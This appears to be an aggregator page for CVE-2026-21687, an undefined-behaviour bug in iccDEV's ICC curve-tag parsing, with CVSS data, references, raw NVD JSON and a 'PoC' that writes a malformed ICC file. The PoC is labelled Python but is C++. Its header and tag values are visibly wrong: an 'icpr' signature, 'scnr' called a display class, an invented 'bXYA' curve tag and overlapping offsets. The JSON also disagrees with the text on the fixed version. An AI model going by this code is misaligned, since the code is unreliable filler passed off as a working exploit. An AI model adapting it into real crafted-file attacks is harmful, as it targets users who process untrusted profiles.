CVE-2026-21687

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagCurve::CIccTagCurve()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE

iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <iostream>
#include <fstream>
#include <cstdint>

// Minimal PoC for CVE-2026-21687
// This demonstrates the structure needed to trigger the undefined behavior

struct malicious_icc_profile {
    uint32_t signature;        // 'ic' + 'pr' or 'appl'
    uint32_t profile_size;
    uint32_t preferred_cmm_type;
    uint32_t profile_version;
    uint32_t profile_device_class;
    uint32_t color_space;
    uint32_t pcs;
    // ... more header fields
};

void create_malicious_profile(const char* filename) {
    // Create a malicious ICC profile that triggers
    // undefined behavior in CIccTagCurve::CIccTagCurve()
    std::ofstream file(filename, std::ios::binary);
    
    // ICC profile header
    char header[128] = {0};
    *(uint32_t*)(header + 0) = 0x69637072;  // 'icpr'
    *(uint32_t*)(header + 4) = 0x200;       // size
    *(uint32_t*)(header + 8) = 0x4D534400;  // 'MS'
    *(uint32_t*)(header + 12) = 0x04000000; // version 4.0
    *(uint32_t*)(header + 16) = 0x73636E72; // 'scnr' (display class)
    *(uint32_t*)(header + 20) = 0x52544742; // 'RTGB' (RGB)
    *(uint32_t*)(header + 24) = 0x52504742; // 'RGB'
    
    file.write(header, 128);
    
    // Tag table with malicious curve data
    uint32_t tag_count = 1;
    file.write((char*)&tag_count, 4);
    
    // Tag entry: curve tag with crafted offset
    uint32_t curve_tag_sig = 0x62585941; // 'bXYA' for curve
    uint32_t offset = 128;
    uint32_t size = 0xFFFFFFFF; // Malicious size causing UB
    
    file.write((char*)&curve_tag_sig, 4);
    file.write((char*)&offset, 4);
    file.write((char*)&size, 4);
    
    // Malicious curve data
    char curve_data[256] = {0};
    // Fill with data that triggers undefined behavior
    file.write(curve_data, 256);
    
    file.close();
    std::cout << "Malicious ICC profile created: " << filename << std::endl;
}

int main() {
    create_malicious_profile("malicious.icc");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21687
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21687
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21687/
[4] VulDB https://vuldb.com/cve/CVE-2026-21687
[5] https://github.com/InternationalColorConsortium/iccDEV/issues/180
[6] https://github.com/InternationalColorConsortium/iccDEV/pull/221
[7] https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-prmm-g479-4fv7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21687", "sourceIdentifier": "[email protected]", "published": "2026-01-07T22:15:44.937", "lastModified": "2026-01-12T18:14:19.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagCurve::CIccTagCurve()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Las versiones anteriores a la 2.3.1.2 tienen comportamiento indefinido en 'CIccTagCurve::CIccTagCurve()'. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La versión 2.3.1.2 contiene un parche. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.1", "matchCriteriaId": "0E50DFFC-9185-4969-85A7-6D3976699720"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/180", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/221", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-prmm-g479-4fv7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}